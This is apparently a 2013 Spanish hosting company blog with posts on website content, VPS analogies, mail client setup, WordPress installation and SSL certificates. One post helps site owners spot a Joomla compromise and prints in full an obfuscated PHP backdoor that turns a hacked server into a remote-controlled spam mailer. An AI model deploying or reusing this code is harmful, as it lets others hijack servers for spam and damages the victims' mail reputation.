Blog

Categoría: Desarrollo web

¿Qué contenido incluyo en mi web?

Publicado en Desarrollo web General en octubre 21, 2013 1:28 pm

Contenido web para incluir en mi página

¿Cómo organizar el contenido de una web?

Cuando elaboras una web, como mínimo debes dejar claro cuál es tu actividad, qué servicios prestas y cuál es la forma de contactar.

1.- ¿QUÉ HACES? ¿QUÉ OFRECES?

Indica cual es la actividad que se desempeña.

Nuestro consejo es que definas de manera escueta qué haces o qué hace tu empresa. Explícalo de manera sencilla. Objetivo a cumplir para este apartado: cualquiera que acceda a la web debe ser capaz de comprender esa definición.

Si además dispones de un eslogan, haz gala de él o crea uno. Los eslóganes son un ejercicio excelente para intentar sintetizar, en un pequeño lema, el espíritu y el carácter diferenciador de una empresa, producto o servicio.

Al describir qué haces, no olvides incluir las palabras clave que definen el núcleo de tu negocio o actividad. No seas rebuscado, simplemente utiliza el sentido común y no las repitas hasta la saciedad porque los buscadores, ahora, penalizan esta práctica. Emplea sinónimos en todo caso.

Google tiene herramientas interesantes que te pueden ayudar a dar con las palabras claves:  Google Adwords, Google Trends o incluso el propio motor de Google que da información sobre las búsquedas más repetidas a medida que el usuario está rellenando la casilla con su propia búsqueda.

2.- PRODUCTOS Y/O SERVICIOS

Ofrece más detalles sobre qué haces y cómo lo haces a lo largo del desarrollo web.

Hay un refrán que dice que una imagen vale más que mil palabras. Y es cierto.

– Si tu negocio se basa en productos tangibles, te resultará fácil presentar la información.

– Si tu negocio se basa en prestar servicios será muy importante trabajar las ideas para ejemplarizarlas y buscar imágenes acordes con lo que se desea transmitir.

Utiliza todos los recursos que estén a tu alcance para mostrar o “hacer tangibles” tus productos y/o servicios, y la filosofía que los rodea:

  •  Portfolio de productos o clientes
  •  Vídeos
  • Testimonios de clientes

Cada vez es más habitual observar pequeños vídeos en las webs resumiendo las principales ventajas del producto o servicio que se presta. Los entendidos en posicionamiento web, además, lo aconsejan con el fin de captar la atención del usuario y aumentar su tiempo de permanencia en la web.

Cómo haces lo que haces es algo que no debes olvidar. Detente en este punto.  No es suficiente con que indiques qué haces, es conveniente que muestres las ventajas competitivas de tu producto y servicio, aquello que consideras que son los puntos fuertes y claramente distintivos. DEBES MOSTRAR TU CARÁCTER DIFERENCIADOR.

3.- CONTACTO

Cuantos más datos facilites para contactar, más empatía y posibilidades de interacción con los usuarios vas a generar.

No pongas enlaces a  redes sociales simplemente “por seguir la moda”. Si creas una cuenta en Twitter, una página en Facebook o en Google+ debes mantenerla actualizada, si no es así, es preferible que ofrezcas los medios de contacto más tradicionales: e-mail y/o teléfono.

Respecto a los formularios de contacto, recuerda que no a todo el mundo le gusta escribir a través de un pequeño hueco que, muchas veces, guarda el contenido sin formato. No olvides poner el e-mail de contacto. Si quieres evitar que la dirección pueda ser captada por robots para el envío de spam, utiliza la fórmula: mail [arroba] dominio [punto] com.

Y en cuanto al teléfono, pese  a lo que muchos puedan pensar,  solo un 25% o 30% de webs incluyen teléfono de contacto y, hoy por hoy, es uno de los datos que más confianza genera en los usuarios.

Los servidores de hosting, como los trajes, mejor a medida

Publicado en Desarrollo web General Nuestros servicios en octubre 14, 2013 3:16 pm

Servidores web a medida + Análisis de desarrollo = Optimización web

¿A que no es lo mismo comprarte un traje y estrenarlo sin más, que solicitar a la boutique que lo ajuste a tus necesidades?

Si eres bajito,  acortarán la chaqueta y cogerán los bajos del pantalón; si tienes chepa, redondearán la caída de la chaqueta para que no cuelgue más por un lado que por otro; si eres de cadera ancha, buscarán unos pantalones de tu talla y estrecharán la pata…

Esto mismo es lo que ocurre con los servidores de hosting. Puedes usar la configuración que viene por defecto o “tunearlo” de acuerdo con los requerimientos de tu proyecto.

Cada aplicación o desarrollo web tiene unas necesidades diferentes: servir contenido de manera rápida, gestionar muchas consultas simultáneas, gestionar procesos complejos, disfrutar de alta disponibilidad, etc.  Todo ello precisa una preparación determinada de la configuración y asignación de recursos en la administración interna del servidor con el fin de optimizar el funcionamiento de la web o aplicación.

Si sastres y costureros aúnan sus esfuerzos es cuando se consigue un traje con la hechura perfecta. Con el hosting y las aplicaciones web ocurre lo mismo: si se suman los esfuerzos de expertos en administración de sistemas a los de los analíticos desarrolladores web, se logra el máximo rendimiento para cada aplicación o web.

5 razones por las que es recomendable tener una web

Publicado en General Nuestros servicios en octubre 7, 2013 10:17 am

Responsive Design o diseño adaptativo

5 RAZONES POR LAS QUE TU NEGOCIO DEBE TENER UNA WEB

1.-¿DÓNDE BUSCA INFORMACIÓN UN USUARIO O CONSUMIDOR?

Tener presencia en Internet es fundamental. Casi el 90% de los consumidores se informa a través de Internet antes de contratar un servicio o comprar un producto, de manera que, puedes ganar confianza de cara al usuario si dispones de una página web informativa.

Si la web, además, está orientada a la interacción con el usuario (posibilidad de dejar comentarios, valoraciones de productos, etc.) aumenta la credibilidad de los consumidores.

Es recomendable que se elija un hosting o servicio de alojamiento web acorde con las necesidades de cada proyecto web para poder servir el contenido web de manera rápida, y para que, en caso de que haya picos de visitas muy elevados cuando se pone en marcha una promoción, por ejemplo, se atienda la demanda correctamente.

2.-APOYO A LA IMAGEN CORPORATIVA

Puedes reforzar la imagen corporativa de tu negocio aportando información sobre tus productos o servicios y sobre tu filosofía de funcionamiento. Los colores de tu negocio, tu logo y otros muchos aspectos gráficos cobran especial relevancia cuando se diseña la web. Esto permite hacer especial hincapié en aspectos subjetivos  relacionados con la emocionalidad de las marcas. La organización de las imágenes y la elaboración de los textos que van a aparecer en la web de un negocio, son un envoltorio muy importante para la generación de sensaciones o impresiones.

3.-NUEVOS CANALES DE VENTA

En algunos casos, puede permitir la apertura de otro canal de venta. Cada vez hay más “tiendas físicas” que consiguen aumentar su volumen de negocio con la inauguración de su comercio online.

4.-INTERESANTE BUZÓN DE SUGERENCIAS

En muchas ocasiones el feedback o respuesta que se obtiene de los clientes y/o potenciales usuarios sirve para retroalimentar la ingeniería de producto, o replantear políticas de atención al cliente, servicios postventa….etc.

5.-LOS DISPOSITIVOS MÓVILES COMIENZAN A CAMBIAR LOS HÁBITOS DE CONSUMO

Conviene adaptarse a las nuevas tendencias de comportamiento. Los dispositivos móviles están cambiando las conductas de consumo. Las búsquedas que se realizan desde el móvil crecen día a día y, también, es mayor el porcentaje de gestiones de compra desde estos dispositivos.

El Responsive Web Design (el diseño adaptativo) es un tipo de desarrollo web que permite que el diseño de una web se amolde por completo al dispositivo desde el que accede el usuario. Hoy en día comienza a ser una premisa primordial a la hora de plantearse la creación o la remodelación de una web.

El funcionamiento de un VPS desde el punto de vista de un granjero

Publicado en General en octubre 1, 2013 10:50 am

Ante la insistente avalancha de consultas sobre cómo explicaría un granjero un sistema de virtualización de hosting, nos vemos abocados a publicar ésto:
 

HOSTING COMPARTIDO

Aunque la situación ideal es un gallinero amplio y con espacio para albergar a todas las gallinas, si entra una gallina demasiado tragona, el resto ve menguada su ración.

O si el granjero decide ampliar el número de gallinas pero no amplía su gallinero o no aumenta sus sacos de pienso, éstas se quedarán con poco sitio y con hambre.

Hosting compartido

 

VPS Y SISTEMA DE HOSTING VIRTUALIZADO

Mientras que cuando se dispone de un hueco adaptado a cada ave en el gallinero, en donde arropar a la prole y con el plato de pienso asegurado, los polluelos tienen el futuro asegurado.

tre galline finte in tre nicchie

¿Cómo configurar una cuenta de correo en Outlook?

Publicado en General Nuestros servicios en septiembre 30, 2013 4:42 pm

PASOS A DAR PARA CONFIGURA UNA CUENTA DE CORREO EN OUTLOOK:

 
1. Accede a tu gestor de correo Outlook y agrega una cuenta:

Crear una cuenta en Outlook

 
2. Selecciona: “configurar manualmente las opciones del servidor o tipos de servidores adicionales” y haz click en “siguiente”:

Configuración manual de la cuenta de correo en Outook

 
3. Elige el servicio de correo electrónico  de Internet y haz click en “Siguiente”

Correo

 
4. En la configuración de la cuenta deberás incluir en:

INFORMACIÓN DEL USUARIO

–          Su nombre: el nombre que te interesa que aparezca cuando alguien reciba tu correo, por ejemplo, Blackslot S.L. o José Lopez

–          Dirección de correo electrónico:  la dirección completa de la cuenta de correo. Ejemplo:  xxxx@tudominio.com

INFORMACIÓN DEL SERVIDOR

–          En tipo de cuenta puedes elegir entre dos protocolos

  • POP: con el protocolo POP,  si abres el gestor Outlook, todo el correo que ha llegado al servidor se descargará en tu Outlook y no quedará ninguna copia en el servidor.
  • IMAP si abres el gestor Outlook, todo el correo que ha llegado al servidor se descargará en tu Outlook pero quedará una copia  en el servidor de modo que podrás acceder al correo desde cualquier otro dispositivo distinto (móvil, tablet, otro portátil o equipo de sobremesa diferente, etc.).

–          Servidor de correo entrante: Este campo siempre se rellena con mail.nombredeldominio.extensión. Ejemplo: mail.tudominio.com

–          Servidor de correo saliente: Este campo siempre se rellena con mail.nombredeldominio.extensión. Ejemplo: mail.tudominio.com

INFORMACIÓN DEL INICIO DE SESIÓN

–          Nombre de usuario: nombre completo de la cuenta, xxxx@tudominio.com

–          Contraseña: la contraseña que pertenece a tu cuenta.
 

AVISO IMPORTANTE:  ¡Pincha después en más configuraciones!
 

Datos a incluir para la configuración de la cuenta

 
5. En la pestaña “Servidor de salida” activa la casilla de “Mi servidor de salida (SMTP) requiere autenticación

Servidor de salida SMTP

 
6.Y en la pestaña de opciones  “Avanzadas” incluye en Servidor de salida (SMTP) el siguiente número de puerto:  587

Y pincha sobre aceptar

Puerto de salida para el correo

 
7. En el otro cuadro de configuración que aún permanece abierto, pincha sobre “Siguiente” y aparecerá un configurador que realizará un testeo automático. Pincha sobre  “cerrar” en esa nueva pantalla.

Prueba de envío y recepción de correo

 
8. Y aparecerá el mensaje final del asistente de configuración.

Mensaje final de configuración de cuenta completada

EL FUNCIONAMIENTO DE UN VPS DESDE EL PUNTO DE VISTA FUTBOLERO

Publicado en Cloud Computing General Servidores privados virtuales en septiembre 25, 2013 5:20 pm

vps_servidores_virtuales

¿QUÉ SON LOS SERVIDORES VPS O SERVIDORES PRIVADOS VIRTUALES?

Los VPS o servidores virtuales son “parcelas” que se acotan dentro de una estructura o plataforma de hosting dando lugar a pequeños servidores independientes en los que no pueden interferir el funcionamiento de otras máquinas virtuales vecinas. Los recursos que se asignan a cada servidor (capacidad de proceso, RAM, etc.) quedan a la completa disposición del usuario y éste puede operar con su servidor privado virtual como si se tratara de un servidor dedicado.

Sirva como ejemplo lo siguiente:

Imagínate que tienes un campo con 20 hectáreas y decides dividirlo para hacer 10 estadios de fútbol. Esos 10 estadios estarían próximos unos a otros, porque todos se construirían en ese terreno, pero cada uno de ellos se podría gestionar de manera completamente independiente.

¿PARA QUÉ SIRVEN LOS SERVIDORES PRIVADOS VIRTUALES?

Los servidores privados virtuales permiten operar como si se dispusiera de un servidor dedicado: reiniciando el VPS , estableciendo el sistema operativo y distribución que más interese, gestionando los límites del php.ini libremente o instalando los módulos y aplicaciones que se precisen.

Sirva como ejemplo lo siguiente:

Al igual que un campo de fútbol de un colegio o de una pequeña localidad no puede acoger a gran afluencia de público, o no cuenta con tantos extras como un gran estadio: una potente iluminación, palcos vip, vestuarios de última generación y enfermería con personal dedicado en exclusiva; con el caso de el hosting compartido y el hosting VPS ocurre lo propio. Las limitaciones del hosting compartido impiden que, en ocasiones, se puedan enviar elevadas cantidades de correos legales simultáneamente,  modificar el peso de los archivos de subida a la web, acceder como root (administrador general) para instalaciones específicas, o realizar cambios en los parámetros de la configuración del servidor (php.ini).

En los servidores privados virtuales, el equipo visitante y el local no comparten vestuario y cada uno puede decidir su propia estrategia.

Instala WordPress en tres pasos a través del nuevo panel Plesk

Publicado en General Nuestros servicios en septiembre 24, 2013 12:11 pm

INSTALA WORDPRESS A GOLPE DE CLICK

WordPress es un gestor de contenidos muy utilizado en la actualidad por las ventajas que ofrece al usuario a la hora de crear su web.

Además, existen infinidad de plantillas que permiten que los usuarios puedan personalizar los diseños web de una manera muy sencilla.

En la versión del nuevo panel se control Plesk 11.5 resulta muy sencillo instalar este gestor de contenidos:

1.- Accede a tu panel Plesk y localiza la pestaña de aplicaciones. Elige WordPress y despliega las opciones del botón derecho para escoger “instalación personalizada”

Instalación sencilla de WordPress

2.- Acepta las condiciones y pincha sobre “siguiente”.

Condiciones de WordPress

3.- Por defecto no se instala en la raíz (directamente bajo el dominio principal) sino que se instala en un directorio específico. Si quieres que se instale bajo el dominio principal bastará con dejar en blanco la casilla que aparece tras /

Recomendamos hacer click sobre “usar credenciales administrativas no conectadas a ningún usuario en particular” e incluir el usuario y la contraseña que se desee.

IMPORANTE: Ese usuario y esa contraseña son las que permitirán acceder al panel de gestión de WordPress de manera directa.

Opciones de instalación de WordPress que vienen por defecto en Plesk

Para acceder a WordPress, ahora simplemente deberás poner en la barra de tu navegador:

http://tudominio.com/wp-admin

e incluir el usuario y contraseña asignados en la instalación en la interfaz que aparecerá.

OTRAS OPCIONES

4.- Si deseas tener la interfaz del panel de gestión de WordPress en castellano, accede a la pestaña de aplicaciones y dentro del WordPress que ya figurará instalado escoge la opción “cambiar configuración”

Cambiar lenguaje en WordPress

5.- Y selecciona el lenguaje que quieras para la interfaz de WordPress

Seleccionar lenguaje castellano para la interfaz de WordPress

Configurar las cuentas de correo con protocolo POP o IMAP

Publicado en General Nuestros servicios en septiembre 23, 2013 10:54 am

Protocolo-POP-IMAP

Generalmente, los usuarios suelen utilizar gestores de correo para organizar y leer sus correos. Algunos de los gestores de correo más utilizados son Outlook, Mail o Thunderbird.

Un usuario puede configurar sus cuentas de correo en su gestor de correo y puede hacerlo de dos maneras:

1.- CONFIGURACIÓN DE LA CUENTA DE CORREO UTILIZANDO EL PROTOCOLO POP

Cuando se utiliza el protocolo POP, el contenido que hay almacenado en el buzón de la cuenta de correo, se descarga al equipo del usuario.

VENTAJAS

Si se dispone de un plan de alojamiento sin demasiada capacidad de almacenamiento, al descargar los e-mails se deja espacio disponible para evitar que se sature la cuota del hosting y así que así puedan seguir entrando nuevos mensajes.

DESVENTAJAS

Si se quiere acceder a este mismo buzón desde cualquier otro dispositivo y lugar, no se podrá visualizar el correo si previamente se ha descargado en el gestor de correo del usuario.

2.- CONFIGURACIÓN DE LA CUENTA DE CORREO UTILIZANDO EL PROTOCOLO IMAP

Cuando se utiliza el protocolo IMAP, el contenido que hay almacenado en el buzón de la cuenta de correo, se descarga al equipo del usuario y, ADEMÁS, se mantiene una copia de esos mails en el servidor donde se alberga el dominio.

VENTAJAS

Se podrá acceder a los correos  almacenados desde cualquier otro dispositivo y lugar.

Por ejemplo, si en el lugar de trabajo el usuario tiene un gestor de correo para sus mails pero tiene que desplazarse fuera de su oficina y entrar a través de un portátil o dispositivo móvil, con la configuración por IMAP, también podrá visualizar sus e-mails.

DESVENTAJAS

Si se trabaja con grandes volúmenes de e-mails, al guardar una copia de todo el contenido, se requerirán servicios de hosting que presten grandes capacidades de almacenamiento. No obstante, siempre es posible configurar la cuenta mediante el procolo IMAP pero guardando una copia de los mails únicamente durante el periodo o número de días que el usuario indique.

Certificados SSL: aumenta la seguridad en tu negocio online

Publicado en General Nuestros servicios en septiembre 19, 2013 5:50 pm

Certificado de seguridad para tus formularios de pago online

¿Qué son los certificados SSL?

• Los certificados de seguridad o SSL aseguran que los datos confidenciales viajen a través de Internet de una forma segura
• Se trata de una medida de seguridad primordial para cualquier página web o aplicación web (e-commerce) en la que se solicita a los usuarios datos o información sensible.

¿Cuáles son las ventajas para tu negocio online?

• Valida que el propietario de la página web es legítimo
• Permiten que aumente la confianza de los usuarios en el sitio, y por lo tanto, que crezca el tráfico y las transacciones en la página.

¿Cómo funcionan los certificados SSL?

A nivel técnico:

• Los datos incluidos por el cliente hacia el servidor donde se aloja la página web se transmiten encriptados o codificados mediante el protocolo SSL
• Estos datos solo se pueden descodificar por el receptor, y no por cualquier tercero

A nivel visual:

Las siguientes características harán saber a los visitantes que están en una página web segura y protegida por un certificado de seguridad.
• Un certificado SSL instalado correctamente eliminará todas las advertencias del navegador
• La dirección web empieza con “https://” en lugar de “http://”
• Una imagen de un candado aparecerá en el navegador y, en algunos casos, la barra de direcciones de la página web se muestra de color verde (solo con los certificados EV)
• Un sello de confianza puede ser colocado en la página web del usuario

Diferentes tipos de certificados SSL según el método de validación

El valor de los certificados SSL no es sólo la transferencia segura de datos entre el usuario final y el servidor web. Una ventaja importante reside en los procedimientos de validación utilizados para comprobar si el solicitante del certificado es legítimo. La diferencia en precio y tiempo de entrega de los certificados SSL depende del método de validación.

MÉTODO DE VALIDACIÓN VENTAJAS Y DESVENTAJAS MERCADO AL QUE SE DIRIGE
EV (Extendida Validación)

El nivel más alto de confianza y seguridad: garantiza al 100% la validez de la página web y aumenta el tráfico de ésta

+ Es el certificado estándar para la industria que realiza transacciones online

+ La barra de direcciones se convierte en color verde en la mayoría de los navegadores

+ Se muestra el nombre del propietario de la página web, y la autoridad de certificación

– Tiempo de entrega: 1 o 2 semanas

– Wildcard no disponibles

* Bancos, financieros, seguros

* Perfecto para las tiendas online, ecommerce

* Empresas grandes

* Páginas web con formulario de inscripción

* Páginas web que necesitan certificado para establecer la confianza de los consumidores

OV (Organización Validación)

Proporciona doble confianza con los visitantes/clientes

+ El nombre del domino y la empresa misma se validan

– No hay “barra de direcciones verde”, por lo que es menos visible la seguridad de la página web

* Páginas web visitadas por usuarios externos (sin datos financieros/datos personales)

* Páginas web de información, foros, o páginas web con formularios

DV (Dominio Validación)

Perfecto en el caso de que necesite un certificado SSL inmediatamente

+ Fácil de obtener

+ Entrega rápida: en minutos

+ La transmisión de datos es segura

– No hay validación de la identidad del propietario de la página web, sólo se comprueba el whois

* Páginas web que sólo necesitan una conexión segura para la intranet, página web en construcción, etc.

* Página web de comunidades que tiene una base de usuarios pequeña

Seguridad Multi-Dominio

Asegura múltiples dominios, subdominios y nombres de host con un sólo certificado

+ Una solución versátil y asequible

+ Capaz de operar con UCC

– Servidor Exchange y múltiples Servidores

– Todos los dominios deben de tener el mismo propietario

* Ideal para las empresas que necesitan proteger varios dominios que están debajo el nombre de un mismo propietario

* Tiendas online que operan bajo distintos nombres de dominios

Seguridad Wildcard

Asegura ilimitados subdominios

+ Para asegurar varios subdominios con un único certificado

+ Use puede usar más de 1 servidor

– No es posible obtener EV

* Útil para las organizaciones que acogen un único dominio, pero diferentes subdominios

Seguridad SGC

Aumenta la seguridad en los navegadores más antiguos y software

+ Aumenta la seguridad de los navegadores antiguos (40-128 bits)

+ Disponible en OV y EV

– Un precio más caro que otros SSL

* Útil para páginas web que atraen a una amplia gama de clientes con todo tipo de navegadores y software

Ya no está operativo nuestro 902, llámanos al 944 063 154

Publicado en General Novedades en septiembre 4, 2013 5:46 pm

Nuevos servicios de hosting en Blackslot

LA VUELTA AL COLE

Septiembre llega cargado de nuevos cambios.

Se avecinan nuevas transformaciones en nuestra web, en nuestros servicios y en nuestros productos.

En nuestro afán por mejorar la calidad en la atención del cliente hemos sustituido nuestro 902 por un 94.Llámanos al 944 063 154 y habla directamente con nuestro equipo.

¿Requieres un proveedor de hosting que te garantice soporte personalizado? ¿Precisas albergar un proyecto web? ¿Necesitas desarrollo a medida? ¿Te interesa transformar en código tus ideas? ¿Quieres estar siempre al día y disfrutar de las últimas tecnologías en tu servidor?

¡Conviértelo en realidad!

Llámanos o escríbenos un mensaje para que sea Blackslot quien contacte contigo.

¿Han hackeado mi Joomla?

Publicado en General Sistemas TI en junio 3, 2013 10:55 am
Joomla hackeado

Descubre cómo limpiar el código malicioso inyectado en Joomla

¿Sospechas que alguien ha hackeado tu Joomla, y está utilizándolo para realizar envíos masivos de correo spam?

Es probable que el hack en cuestión tenga forma de archivo .php, y se encuentre mezclado con el resto de los archivos de tu página web. El nombre del archivo es completamente aleatorio, y no afecta a su funcionamiento. Lo importante es el código dentro del mismo, que tiene este aspecto:

<?php
@error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); if (count($_POST) < 2) { die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); } $v5031e998 = false; foreach (array_keys
($_POST) as $v3c6e0b8a) { switch ($v3c6e0b8a[0]) { case chr(108): $vd56b6998 = $v3c6e0b8a; break; case chr(100): $v8d777f38 = $v3c6e0b8a; break; case chr(109): $v3d26b0b1 = $v3c6e0b8a; break; ca
se chr(101); $v5031e998 = true; break; } } if ($vd56b6998 === '' || $v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321)); $v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disabl
e_functions')); $v01b6e203 = @$_POST[$vd56b6998]; $v8d777f38 = @$_POST[$v8d777f38]; $v3d26b0b1 = @$_POST[$v3d26b0b1]; if ($v5031e998) { $v01b6e203 = n9a2d8ce3($v01b6e203); $v8d777f38 = n9a2d8ce3
($v8d777f38); $v3d26b0b1 = n9a2d8ce3($v3d26b0b1); } $v01b6e203 = urldecode(stripslashes($v01b6e203)); $v8d777f38 = urldecode(stripslashes($v8d777f38)); $v3d26b0b1 = urldecode(stripslashes($v3d26
b0b1)); if (strpos($v01b6e203, ';', 1) != false) { list($va3da707b, $vbfbb12dc, $v081bde0c) = preg_split('/;/',strtolower($v01b6e203)); $va3da707b = ucfirst($va3da707b); $vbfbb12dc = ucfirst($vb
fbb12dc); $v3a5939e4 = next(explode('@', $v081bde0c)); if ($vbfbb12dc == '' || $va3da707b == '') { $vbfbb12dc = $va3da707b = ''; $v01b6e203 = $v081bde0c; } else { $v01b6e203 = "\"$va3da707b $vbf
bb12dc\" <$v081bde0c>"; } } else { $vbfbb12dc = $va3da707b = ''; $v081bde0c = strtolower($v01b6e203); $v3a5939e4 = next(explode('@', $v01b6e203)); } preg_match('|<USER>(.*)</USER>|imsU', $v8d777
f38, $vee11cbb1); $vee11cbb1 = $vee11cbb1[1]; preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c); $vb068931c = $vb068931c[1]; preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc3448
7c9); $vc34487c9 = $vc34487c9[1]; preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42); $v6f4b5f42= $v6f4b5f42[1]; $vc34487c9 = str_replace("%R_NAME%", $va3da707b, $vc34487c9); $vc344
87c9 = str_replace("%R_LNAME%", $vbfbb12dc, $vc34487c9); $v6f4b5f42 = str_replace("%R_NAME%", $va3da707b, $v6f4b5f42); $v6f4b5f42 = str_replace("%R_LNAME%", $vbfbb12dc, $v6f4b5f42); $v0897acf4 =
preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']); if (ne667da76($v0897acf4) || @ini_get('safe_mode')) $v10497e3f = false; else $v10497e3f = true; $v9a5cb5d8 = "$vee11cbb1@$v0897acf4"
; if ($vb068931c != '') $vd98a07f8 = "$vb068931c <$v9a5cb5d8>"; else $vd98a07f8 = $v9a5cb5d8; $vb8ddc93f = "From: $vd98a07f8\r\n"; $vb8ddc93f .= "Reply-To: $vd98a07f8\r\n"; $v3c87b187 = "X-Prior
ity: 3 (Normal)\r\n"; $v3c87b187 .= "MIME-Version: 1.0\r\n"; $v3c87b187 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n"; $v3c87b187 .= "Content-Transfer-Encoding: 8bit\r\n"; if (!in_arr
ay('mail', $v619d75f8)) { if ($v10497e3f) { if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $vb8ddc93f.$v3c87b187, "-f$v9a5cb5d8")) die(chr(79).chr(75).md5(1234567890)."+0"); } else { if (@mail($v
01b6e203, $vc34487c9, $v6f4b5f42, $v3c87b187)) die(chr(79).chr(75).md5(1234567890)."+0"); } } $v4340fd73 = "Date: " . @date("D, j M Y G:i:s O")."\r\n" . $vb8ddc93f; $v4340fd73 .= "Message-ID: <"
.preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time()))."@$v0897acf4>\r\n"; $v4340fd73 .= "To: $v01b6e203\r\n"; $v4340fd73 .= "Subject: $vc34487c9\r\n"; $v4340fd73 .= $v3c87b187; $v841a
2d68 = $v4340fd73."\r\n".$v6f4b5f42; if ($v3d26b0b1 == '') $v3d26b0b1 = n9c812bad($v3a5939e4); if (($vb4a88417 = n7b0ecdff($v9a5cb5d8, $v081bde0c, $v841a2d68, $v0897acf4, $v3d26b0b1)) == 0) { di
e(chr(79).chr(75).md5(1234567890)."+1"); } else { echo PHP_OS.chr(50).chr(48).'+'.md5(0987654321)."+$vb4a88417"; } function ne667da76($v957b527b){ return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0
-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b); } function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685="=\r\n", $v92f21a0f = 0, $v3303c65a
= false) { $vf5a8e923 = strlen($vb45cffe0); $vb4a88417 = ''; for($v865c0c0b = 0; $v865c0c0b < $vf5a8e923; $v865c0c0b++) { if ($v11a95b8a >= 75) { $v11a95b8a = $v92f21a0f; $vb4a88417 .= $v7fa1b6
85; } $v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]); if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) { if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$v3303c65a)) {
$vb4a88417.=chr($v4a8a08f0); $v11a95b8a = 0; continue; } $vb4a88417 .='='.str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT); $v11a95b8a += 3; continue; } $vb4a88417 .= chr($v4a8a08f0
); $v11a95b8a++; } return $vb4a88417; } function n7b0ecdff($vd98a07f8, $v01b6e203, $v841a2d68, $v0897acf4, $v3d26b0b1) { global $v619d75f8; if (!in_array('fsockopen', $v619d75f8)) $v66b18866 = @
fsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('pfsockopen', $v619d75f8)) $v66b18866 = @pfsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('strea
m_socket_client', $v619d75f8) && function_exists("stream_socket_client")) $v66b18866 = @stream_socket_client("tcp://$v3d26b0b1:25", $v70106d0d, $v809b1abe, 20); else return -1; if (!$v66b18866)
{ return 1; } else { $v8d777f38 = n54070395($v66b18866); @fputs($v66b18866, "EHLO $v0897acf4\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "2+($v01b6e20
3)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "MAIL FROM:<$vd98a07f8>\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "3+($v01b
6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "RCPT TO:<$v01b6e203>\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 && substr($ve98d
2f00, 0, 3) != 251) return "4+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "DATA\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) !=
354 ) return "5+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, $v841a2d68."\r\n.\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 25
0 ) return "6+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "QUIT\r\n"); @fclose($v66b18866); return 0; } } function n54070395($v66b18866) { $v8d777f38 = '';
while($v341be97d = @fgets($v66b18866, 4096)) { $v8d777f38 .= $v341be97d; if(substr($v341be97d, 3, 1) == ' ') break; } return $v8d777f38; } function n9c812bad($vad5f82e8) { global $v619d75f8; if
(!in_array('getmxrr', $v619d75f8) && function_exists("getmxrr")) { @getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816); if (count($v744fa43b) === 0) return '127.0.0.1'; $v865c0c0b = array_keys($v6c5ea
816, min($v6c5ea816)); return $v744fa43b[$v865c0c0b[0]]; } else { return '127.0.0.1'; } } function n9a2d8ce3($v1cb251ec) { $v1cb251ec = base64_decode($v1cb251ec); $vc68271a6 = ''; for($v865c0c0b
= 0; $v865c0c0b < strlen($v1cb251ec); $v865c0c0b++) $vc68271a6 .= chr(ord($v1cb251ec[$v865c0c0b]) ^ 2); return $vc68271a6; } ?>

Si encuentras un archivo desconocido fuera de lugar, que tú no has creado y que lleva este código dentro, bórralo inmediatamente.

El riesgo principal, más allá de la seguridad de tu sitio, es que todas las cuentas de correo dependientes de tus dominios entren en listas negras de spam, impidiéndote enviar y recibir correo correctamente. El proceso para salir de las listas negras puede ser largo en el peor de los casos, pudiendo dejar tus cuentas de correo inutilizadas durante varios días.

Mega ya está aquí

Publicado en General en enero 22, 2013 3:27 pm

Logo_Mega

Kim Dotcom  ha vuelto y lo ha hecho como él solo sabe, a lo grande. El lanzamiento de Mega el pasado día 19 de Enero, ha tenido al mundo  en vilo durante meses, lo que  provocó que en tan solo una hora se registraran cerca de 100 mil usuarios, y que, durante su primer día de vida, el número de cuentas ascendiera hasta el millón.

Estas cifras astronómicas son una buena noticia para el sucesor de la plataforma Megaupload, que llevó a su creador a  prisión acusado de piratería tras una detención digna de cualquier película de Hollywood.

Algunas de las novedades que Dotcom ofrece en Mega son: 50GB de almacenamiento gratuito, servicios de correo electrónico y registro de dominios, acceso móvil y mensajería instantánea. Además, también cabe la posibilidad de contratar sus servicios pudiendo elegir entre tres planes diferentes, que abarcan desde los 500GB hasta 4TB de almacenamiento.

